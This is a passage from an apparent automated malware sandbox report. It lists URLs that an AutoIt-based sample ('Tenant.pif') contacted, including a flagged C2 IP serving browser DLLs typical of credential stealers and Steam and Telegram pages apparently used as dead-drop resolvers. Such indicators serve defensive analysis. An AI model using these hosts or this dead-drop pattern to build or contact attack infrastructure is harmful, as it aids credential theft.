                      		95.164.119.162
                      		truetrue
                        		unknown
                        gCmUfnfZJOKMjo.gCmUfnfZJOKMjo
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://steamcommunity.com/profiles/76561199761128941true
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/nss3.dlltrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/sqlr.dlltrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/true
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/vcruntime140.dlltrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/freebl3.dlltrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/mozglue.dlltrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/softokn3.dlltrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://stadiatechnologies.com/true
                          • Avira URL Cloud: safe
                          		unknown
                          https://94.130.188.148/msvcp140.dlltrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabKEBKJD.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://t.me/iyigunlTenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://duckduckgo.com/ac/?q=KEBKJD.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/?subsection=broadcastsTenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/subscriber_agreement/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=iyaDfxhcTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.autoitscript.com/autoit3/file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://94.130.188.148/vcruntime140.dllCzTenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.valvesoftware.com/legal.htmTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngTenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngTenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://stadiatechnologies.comntent-Disposition:Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/765611997611289410Tenant.pif, 0000000B.00000002.4072894428.0000000001394000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=enTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199761128941/badgesTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.autoitscript.com/autoit3/Jfile.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp, Tenant.pif.2.dr, Neo.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mozilla.com/en-US/blocklist/Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://mozilla.org0/Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://stadiatechnologies.comTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://store.steampowered.com/privacy_agreement/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/points/shop/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KEBKJD.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/login/home/?goto=profiles%2F7656119976112894176561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.ecosia.org/newtab/KEBKJD.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHJKECA.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/privacy_agreement/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://94.130.188.14887631f194nt-Disposition:Tenant.pif, 0000000B.00000002.4068394882.0000000000182000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://94.130.188.148/softokn3.dlleTenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199761128941bTenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://stadiatechnologies.com/JTenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLHJKECA.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refTenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngTenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://stadiatechnologies.alntent-Disposition:Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/about/76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/my/wishlist/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://stadia.188.148HIETenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&aTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://help.steampowered.com/en/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/market/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/news/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiCBFCBK.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KEBKJD.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://store.steampowered.com/subscriber_agreement/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://94.130.188.14876561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199761128941/inventory/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drtrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://94.130.188.148/nss3.dllKEBKJD-journalTenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/discussions/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/stats/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cii-Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/steam_refunds/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://t.me/iyigunlhellosqlr.dllsqlite3.dllInTenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchKEBKJD.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://94.130.188.148/mozglue.dllqTenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=od0wu57c9_w6&amp;l=eTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/workshop/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://94.130.188.148/sqlr.dll1Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://store.steampowered.com/legal/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://stadiatechnologies.1f19464;Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sqlite.org/copyright.html.Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077975968.000000000C51D000.00000002.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://94.130.188.148DGITenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://94.130.188.148JKFTenant.pif, 0000000B.00000002.4068394882.00000000002BC000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoKEBKJD.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://94.130.188.148/msvcp140.dllITenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://upx.sf.netAmcache.hve.17.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

